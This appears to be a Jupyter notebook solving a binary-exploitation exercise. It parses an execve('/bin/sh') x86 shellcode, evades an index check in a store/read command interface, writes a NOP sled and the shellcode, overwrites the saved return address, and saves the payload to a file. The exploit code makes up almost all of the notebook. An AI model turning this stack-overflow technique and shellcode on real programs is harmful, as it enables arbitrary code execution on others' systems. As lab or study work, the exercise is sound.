### Parsing shellcode

We're using [this shellcode](https://shell-storm.org/shellcode/files/shellcode-863.php).

In [80]:
shellcode = """
\\xeb \\x25 \\x5e \\x89
\\xf7 \\x31 \\xc0 \\x50
\\x89 \\xe2 \\x50 \\x83
\\xc4 \\x03 \\x8d \\x76
\\x04 \\x33 \\x06 \\x50
\\x31 \\xc0 \\x33 \\x07
\\x50 \\x89 \\xe3 \\x31
\\xc0 \\x50 \\x8d \\x3b
\\x57 \\x89 \\xe1 \\xb0
\\x0b \\xcd \\x80 \\xe8
\\xd6 \\xff \\xff \\xff
\\x2f \\x2f \\x62 \\x69
\\x6e \\x2f \\x73 \\x68
"""

In [81]:
def get_uint(line):
    hexbytes = line.strip().split()
    hexbytes = [v[2:] for v in hexbytes]
    hexvalue = '0x' + ''.join(reversed(hexbytes))
    return eval(hexvalue)


shlcode_lines = shellcode.strip().split('\n')
shlcode_values = list(map(get_uint, shlcode_lines))

### Initializing Command Writer

In [82]:
class CmdWriter:

    # we avoiding using multiples of 3 as indices
    prefix = 0b01000000000000000000000000000000

    def __init__(self):
        self.idx = 0
        self.lines = []
    
    def store(self, value, idx=None):
        if idx is None:
            idx = self.idx
            self.idx += 1
        
        self.lines.append('store')
        self.lines.append(f'{value}')
        self.lines.append(f'{self._get_idx(idx)}')
    
    def read(self, idx):
        self.lines.append('read')
        self.lines.append(f'{idx}')
    
    def quit(self):
        self.lines.append('quit')
    
    def __repr__(self):
        return '\n'.join(self.lines) + '\n'
    
    def _get_idx(self, idx):
        return idx if idx % 3 else self.prefix + idx


In [83]:
writer = CmdWriter()

### Writing injection

Adding NOP instructions

In [84]:
n_nop = 200
for i in range(n_nop // 4):
    writer.store(0x90909090)

Writing shellcode

In [85]:
for value in shlcode_values:
    writer.store(value)

Then we need to overwrite location at idx 114 and store `0xffffd544 + 50`, where we're leaving 50 bytes of slack to account for the stack shift when running code inside and outside `gdb`. We've added a NOP slide, so the precise location doesn't matter.

In [86]:
writer.store(0xffffd544 + 50, 114)

Testing values by reading and quitting

In [87]:
writer.read(0)
writer.read(114)
writer.quit()

### Writing output

In [88]:
with open('input.txt', 'w') as f:
    f.write(str(writer))